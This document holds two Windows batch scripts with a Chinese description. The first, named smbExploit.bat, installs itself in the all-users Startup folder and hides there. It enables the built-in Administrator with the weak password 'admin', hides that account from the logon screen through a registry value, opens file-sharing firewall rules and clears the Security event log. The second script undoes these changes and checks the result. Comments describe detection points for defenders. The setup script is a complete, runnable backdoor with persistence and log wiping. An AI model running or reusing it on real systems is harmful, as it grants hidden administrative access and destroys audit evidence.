脚本功能
实现开机自动启用主机文件共享服务,并启用管理员账户,开启防火墙文件共享配置,并为管理员账户和脚本文件做了隐藏,以及日志清除。
第二段脚本用于恢复操作。回显还原进程的信息交互。
@echo off&color 0A
rem ---------------------------------------------------------------------------
rem Setup script (everything up to "wevtutil cl security"). Read it as the list
rem of host changes the rollback script below has to undo, and as the footprint
rem a defender can look for: an autorun file in the all-users Startup folder,
rem the built-in Administrator re-enabled with a fixed weak password, a Winlogon
rem registry value, a started service, an enabled firewall rule group, and a
rem cleared Security event log.
rem ---------------------------------------------------------------------------
rem call smbExploitRelieve.bat
rem change code page into utf-8 (the firewall group name below is Chinese text)
chcp 65001 >nul 2>nul
rem change command directory into the dir where the current script in
cd /d %~dp0 >nul 2>nul
cd
rem copy to startmenu of user
rem copy smbExploit.bat "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" >nul 2>nul
rem copy to startmenu of system
rem Persistence: the all-users Startup folder runs this file at every
rem interactive logon. Detection: file-creation monitoring on this folder;
rem autorun inventories list it as well.
copy smbExploit.bat "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" >nul 2>nul
rem modify file attribute
rem attrib +S +H "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smbExploit.bat" >nul 2>nul
rem system startmenu
rem +S +H only hides the file from a plain "dir"; "dir /a" (which the
rem rollback's verify step uses) still lists it.
attrib +S +H "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" >nul 2>nul
rem active administrator
rem Enables the built-in Administrator AND sets its password to the literal
rem "admin", a weak shared credential. If account-management auditing is on,
rem the enable and the password reset appear in the Security log
rem (Event IDs 4722 / 4724) until the log is cleared at the end of this script.
net user administrator admin /active:yes >nul 2>nul
rem add reg to hide administrator account on system login window
rem The rollback deletes this same value; its verify step should query this
rem same key path.
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserList" /v administrator /t REG_DWORD /d 0 >nul 2>nul
rem modify ACL of file
rem echo Y|cacls "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smbExploit.bat" /G administrator:F >nul 2>nul
rem system directory
rem cacls /G replaces the whole ACL with administrator:F (echo Y answers the
rem confirmation prompt); the rollback has to widen it again before deleting.
echo Y|cacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" /G administrator:F >nul 2>nul
rem start net share service
rem FDResPub = Function Discovery Resource Publication. "net start" only
rem starts it for this session; it does not change the service's startup type.
net start FDResPub >nul 2>nul
rem enable firewall config about files share
rem Enables every rule in the "File and Printer Sharing" group, addressed by
rem its Chinese-locale display name.
netsh advfirewall firewall set rule group="文件和打印机共享" new enable=yes >nul 2>nul
rem clear log
rem Anti-forensics: wipes the Security log, including the account events above.
rem The clear itself is recorded as the first event of the new log
rem (Security Event ID 1102), and the rollback script cannot restore the old log.
wevtutil cl security >nul 2>nul
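@echo off&color 0A
rem ---------------------------------------------------------------------------
rem Rollback script for the setup script above. Undoes each host change in
rem the order it was made (file ACL, file attributes, Administrator account,
rem Winlogon registry value, Startup file, FDResPub service, firewall rule
rem group) and then offers an interactive verification pass.
rem Each step appends its stderr to %userprofile%\errInfo.txt; an empty file
rem at the end means every step reported success.
rem Not reversible: the Security log cleared by the setup script. The clear is
rem itself recorded in the new log as Security Event ID 1102.
rem ---------------------------------------------------------------------------
rem Same code page as the setup script; without it the Chinese firewall group
rem name and the choice prompt below are mangled. Assumes the file is UTF-8.
chcp 65001 >nul 2>nul
setlocal
rem Quoted everywhere below: %userprofile% may contain spaces, and an unquoted
rem redirection target would then break the command it belongs to.
set "errlog=%userprofile%\errInfo.txt"
rem Truncate first: every step appends, so errors left over from an earlier run
rem would otherwise make the success check below fail.
type nul > "%errlog%"
echo ------modifing ACL
rem echo Y|cacls "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" /G everyone:F 1>nul
rem cacls /G replaces the ACL, widening it from administrator:F so the file can
rem be deleted from the current account. NOTE(review): everyone:F is broader
rem than needed; the exposure is short because the file is removed below.
echo Y|cacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" /G everyone:F 1>nul 2>>"%errlog%"
rem returns 0 on success, 2 when the file is not found
echo ------modifing file attributes
rem attrib -S -H "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" 1>nul
rem stderr deliberately not captured: "file not found" is not a failure here
attrib -S -H "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" 1>nul
rem returns 0 on success and also 0 when the file is not found
echo ------baning administrator account
net user administrator /active:NO 1>nul 2>>"%errlog%"
rem returns 2 on access denied, 0 on success
echo ------deleting correlative reg object
rem same key and value name the setup script wrote
echo yes|reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserList" /v administrator 1>nul 2>>"%errlog%"
rem returns 0 on success, 1 on access denied, 1 when the value is not found
echo ------deleting exp
rem del "%userprofile%\Start Menu\Programs\Startup\smbExploit.bat" 1>nul
del "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\smbExploit.bat" 1>nul
rem errorlevel = 0 both on success and when the file is not found
rem stop service
net stop fdrespub 1>nul 2>>"%errlog%"
rem returns 2 when the service is not running, 0 on success
rem reset firewall rules
netsh advfirewall firewall set rule group="文件和打印机共享" new enable=no 1>nul 2>>"%errlog%"
rem returns 1 on insufficient privilege, 0 when the rules were updated
for %%a in ("%errlog%") do (
  if "%%~za" equ "0" (
    echo :::::::::::::::::::::::::::::::::::::::::::::::
    echo smbExploit deleted,and rollbacked the operation of exp,have a good day!
  ) else (
    rem at least one step wrote to stderr: show what it said
    echo :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    echo :::::::::::::here is the correlative error:::::::::::::::::::::
    echo :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
    type "%errlog%"
  )
)
rem Y = errorlevel 1, N = errorlevel 2; Y is chosen automatically after 5 s
choice /C YN /T 5 /M "是否继续检查相关信息?" /D Y
if errorlevel 2 (
  del "%errlog%"
  exit
)
if errorlevel 1 (
  echo ::::::::::::::::::::start information check::::::::::::::::::::::::::::::::
  echo ------check administrator account
  net user administrator
  echo ------check correlative reg object
  rem the key the setup script wrote and this script deleted from ...
  reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\UserList"
  rem ... and the key the original verify step looked at
  reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts"
  echo ------check the state of net share service
  sc query FDResPub|find /I "state"
  echo ------check firewall rules
  netsh advfirewall firewall show rule name="文件和打印机共享(回显请求 - ICMPv4-In)" verbose
  echo ------check exp file
  dir "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp" /A|find "smbExploit.bat"
  rem dir "%userprofile%\Start Menu\Programs\Startup" /A|find "smbExploit.bat"
)
del "%errlog%"
pause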